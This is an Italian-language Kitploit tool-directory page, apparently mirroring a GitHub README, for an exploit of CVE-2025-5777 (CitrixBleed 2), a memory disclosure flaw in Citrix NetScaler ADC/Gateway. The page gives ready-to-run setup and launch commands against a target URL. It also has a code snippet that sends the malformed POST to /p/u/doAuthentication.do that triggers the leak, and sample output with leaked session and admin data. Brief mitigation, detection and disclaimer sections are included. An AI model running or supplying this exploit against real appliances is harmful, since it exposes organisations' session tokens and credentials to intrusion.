Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-5777 — CVE-2025-5777 Exploit di perdita di memoria di Citrix NetScaler (CitrixBleed 2) | Kitploit
Strumenti/GitHubGitHub/bughuntar/cve-2025-5777
Memory ForensicsAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubbughuntar/cve-2025-5777

CVE-2025-5777

CVE-2025-5777 Exploit di perdita di memoria di Citrix NetScaler (CitrixBleed 2)

Vedi Repository
307531 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-5777 - Exploit della perdita di memoria di Citrix NetScaler

Banner


📌 Panoramica

Questo strumento dimostra CVE-2025-5777, una vulnerabilità critica di divulgazione della memoria nei dispositivi Citrix NetScaler ADC/Gateway. L'exploit espone contenuti sensibili della memoria tramite richieste di autenticazione malformate.

Caratteristiche principali:
✔ Rilevamento della perdita di memoria tramite parsing delle risposte XML
✔ Dump Hex+ASCII delle regioni di memoria esposte
✔ Formato di richiesta compatibile con Burp Suite
✔ Richieste asincrone per test efficienti


🔍 Prova di Concetto

1. Richiesta Vulnerabile (Burp Suite)

Richiesta Burp

2. Exploit in Azione

Esecuzione dello Strumento


⚡ Avvio Rapido

root@kitploit:~
git clone https://github.com/bughuntar/CVE-2025-5777.git
cd CVE-2025-5777
pip install requests beautifulsoup4 aiohttp colorama
chmod +x citrix_memory_leak.py
python3 citrix_memory_leak.py https://target-netscaler.com

Output atteso:

root@kitploit:~
+ [+] Memory leak detected!
--- Leaked Memory Hex Dump ---
00000000  73 65 73 73 69 6F 6E 3D 31 32 33 34 35 36 37 38  session=12345678
00000010  55 73 65 72 3A 20 61 64 6D 69 6E 00 00 00 00 00  User: admin.....

🛡️ Mitigazione

AzioneComando/Riferimento
PatchCitrix Security Bulletin
Regola WAFBlock POST /p/u/doAuthentication.do with malformed params

📚 Risorse

  • Scheda NVD
  • Analisi Tecnica

🖥️ Estratti di Codice

root@kitploit:~
# Malformed request trigger
async def exploit(target):
    async with aiohttp.post(
        f"{target}/p/u/doAuthentication.do",
        data="login",  # Missing equals sign triggers leak
        ssl=False
    ) as response:
        await parse_leak(await response.read())

⚠️ Avviso Legale

root@kitploit:~
- Questo strumento è SOLO per test autorizzati.
- L'uso non autorizzato viola le leggi internazionali sulla cybersicurezza.

Disclaimer completo: DISCLAIMER.md

Autore: Professor the Hunter

Scarica lo strumento
Rilevamento
grep 'POST /p/u/doAuthentication.do' netscaler.log